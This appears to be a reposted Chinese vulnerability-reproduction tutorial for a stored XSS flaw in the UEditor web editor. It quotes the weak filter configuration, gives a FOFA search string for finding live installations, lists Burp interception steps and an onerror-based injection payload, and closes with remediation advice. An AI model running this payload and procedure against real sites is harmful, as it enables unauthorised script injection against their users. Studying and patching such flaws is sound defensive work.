UEditor是由百度web前端研发部开发的所见即所得富文本web编辑器,具有轻量,可定制,注重用户体验等特点。UEditor存在一个XSS漏洞,编辑器在定义过滤规则的时候不严和读取内容的时候的绕过导致了该漏洞。
漏洞影响
UEditor漏洞复现
1)FOFA搜索(这边只是随便找了个存在UE编辑器的系统测试)
"/seller.php?s=/Public/login"
2)UE编辑器界面
3)漏洞文件产生在前端配置文件
ueditor.config.js
过滤规则如下,对一些危险的标签没有做过滤。
'filterTxtRules' : function(){function transP(node){node.tagName = 'p';node.setStyle();}return {//直接删除及其字节点内容'-' : 'script style object iframe embed input select','p': {$:{}},'br':{$:{}},'div':{'$':{}},'li':{'$':{}},'caption':transP,'th':transP,'tr':transP,'h1':transP,'h2':transP,'h3':transP,'h4':transP,'h5':transP,'h6':transP,'td':function(node){//没有内容的td直接删掉var txt = !!node.innerText();if(txt){node.parentNode.insertAfter(UE.uNode.createText(' '),node);}node.parentNode.removeChild(node,node.innerText())}}}()
4)通过getContent和setContent方法用<p>标签读取编辑器内容,从下图的截图看,直接写payload是不会被执行的,需要我们删除P标签
var ue = UE.getEditor();//对编辑器的操作最好在编辑器ready之后再做ue.ready(function(){//设置编辑器的内容ue.setContent('hello');//获取html内容,返回: <p>hello</p>var html = ue.getContent();//获取纯文本内容,返回: hellovar txt = ue.getContentTxt();});
5)咱们正常在UE编辑器界面,随便写个文本内容,点击一下HTML按钮,出现的内容如下
6)直接提交BP抓包
7)删除P标签以及文本内容
8)插入构造payload,发送数据包
%3Cp%3Emobei"><ImG sRc=1 OnErRoR=prompt(1)>%3Cbr%2F%3E%3C%2Fp%3E
9)成功添加文章,点击编辑或者直接查看弹窗
10)如果没有提交或者保存的功能,那么无法与数据库交互形成存储XSS,但是依然可多次点击左上角html按钮触发xss
修护建议
1、修改 xss过滤白名单 配置文件ueditor.config.js,增加白名单过滤,比如对一些非法的参数和标签,像 <>、,",',img标签的onerror属性,script标签等进行自动转义,或者是强制的拦截并提示。2、对输入的数据也进行html转义,使其不会识别为可执行脚本。
原文始发于微信公众号(五六七安全团队):UEditor编辑器存储型XSS漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论